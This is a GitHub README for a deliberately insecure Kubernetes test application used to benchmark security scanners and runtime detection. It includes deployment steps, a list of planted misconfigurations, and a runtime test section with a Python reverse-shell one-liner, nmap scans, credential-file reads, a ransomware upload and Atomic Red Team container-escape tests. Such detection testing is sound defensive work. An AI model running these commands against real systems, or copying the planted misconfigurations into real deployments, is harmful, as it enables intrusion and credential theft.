Skip to content

Latest commit

 

History

History
107 lines (74 loc) · 5.93 KB

README.md

File metadata and controls

107 lines (74 loc) · 5.93 KB


Insecure Kubernetes App

GitHub stars GitHub release (latest by date) GitHub issues GitHub pull requests GitHub Discord Docker Pulls

Test every type of configuration scanner against a single repo that's comically insecure with documented issues

About Latio

Deployment:

This will create an EKS cluster with some insecure application pods for testing.

  1. Make sure you have Terraform, Helm, AWS CLI, eksctl and a valid AWS user configured

  2. Move to terraform directory, cd terraform

  3. Apply the terraform, this creates an EKS cluster for testing: terraform init terraform plan terraform apply This creates two EKS node groups, one publicly accessible over SSH and another private. These will run small instances, be sure to terraform destroy when you're done for minimal fees. This takes about 15 minutes.

  4. Add the Terraform EKS details to your kubeconfig

aws eks --region $(terraform output -raw region) update-kubeconfig \
    --name $(terraform output -raw cluster_name)
  1. Grant your user access to the kubernetes cluster you created - through the Console it's adding the AmazonEKSAdminPolicy and AmazonEKSClusterAdminPolicy to your user. Console > Access > Create access entry > Select your current user > Add AmazonEKSAdminPolicy and AmazonEKSClusterAdminPolicy. I didn't test this, but there's probably a one liner to do this with CLI like aws eks create-access-entry --cluster-name my-cluster --principal-arn arn:aws:iam::111122223333:user/my-user --type Standard --username my-user

  2. Move to the helm chart directory cd ../insecure-chart/

  3. Deploy the insecure app, busybox pod, and workload security evaluator helm install insecure-app . --create-namespace --namespace=insecure-app

  4. To test in these pods:

Get pod name, kubectl get pods -n insecure-app or kubectl get pods -n insecure-app

For testing insecure-app, run kubectl port-forward pod/[POD-NAME] 8080:8080 -n insecure-app. You can now test in your browser at http://localhost:8080/

For testing insecure-app0js, run kubectl port-forward pod/[POD-NAME] 3000:3000 -n insecure-js. You can now test in your browser at http://localhost:8080/

For workload-security-evaluator, run k exec -it [POD-NAME] -n insecure-app -- /bin/bash, then pwsh to being invoking tests such as Invoke-AtomicTest T1105-27 -ShowDetails

  1. terraform destroy when you're done!

This Repo Contains the following issues:

General Configuration Issues

  1. Busybox is deployed as a long running pod with plenty of dangerous utilities on it
  2. Insecure App has fake AWS access keys as env variables, mounts the docker socket, runs in privileged mode, is open on port 8080 and port 22, and binds an SA role with permissions to create more SA roles
  3. Workload Security Evaluator contains all the same issues

Insecure-app

  1. Takes raw input as a web form and runs it as root on the server and returns the input to the user
  2. Allows for unvalidated file uploads
  3. Is running in debug mode
  4. Has way more utilities on its Dockerfile than it needs

Workload-security-evaluator

  1. Is forked from DataDog
  2. Is used for running tests from Atomic Red Team

Testing

Misconfigurations

  1. AWS creds in env variables
  2. SSH port open
  3. SA credentials have ability to create new credentials
  4. Privileged container
  5. Docker socket mounted

Runtime

  1. Run python3 --version and ls -al via the web form - detects if it can tell that the python process is running bash commands
  2. Run apt-get update and apt-get install hydra -y - to check for package installs
  3. Scan the local port range to look for network detections - nmap -sS 192.168.1.1-254
  4. Try to spawn a reverse shell
    • bash into workload-security and run apt-get install netcat
    • nc -lvnp 9001
    • export RHOST="WORKLOAD-POD-IP";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
  5. Check what secrets we might have access to printenv and cat ~/.aws/credentials
  6. Upload ransomware python script ransomware.py- this will indicate the level of alerting, if it's new file, python, or specifics about the python
  7. Exec into the workload security evaluator pod with k exec -it [POD-NAME] -n insecure-app -- /bin/bash, then pwsh
  8. Invoke-AtomicTest T1105-27 - download and run a file
  9. Invoke-AtomicTest T1046-2 - run nmap
  10. Invoke-AtomicTest T1053.003-2 - modify cron jobs
  11. Invoke-AtomicTest T1070.003-1 - clear bash history
  12. Invoke-AtomicTest T1611-1,2 - Container escape
  13. Check agent utilization with k top pod --all-namespaces <<<<<<< HEAD =======

Readme change

b8e1c4d61873ed7566d33dcd8bd4b76bcf86e450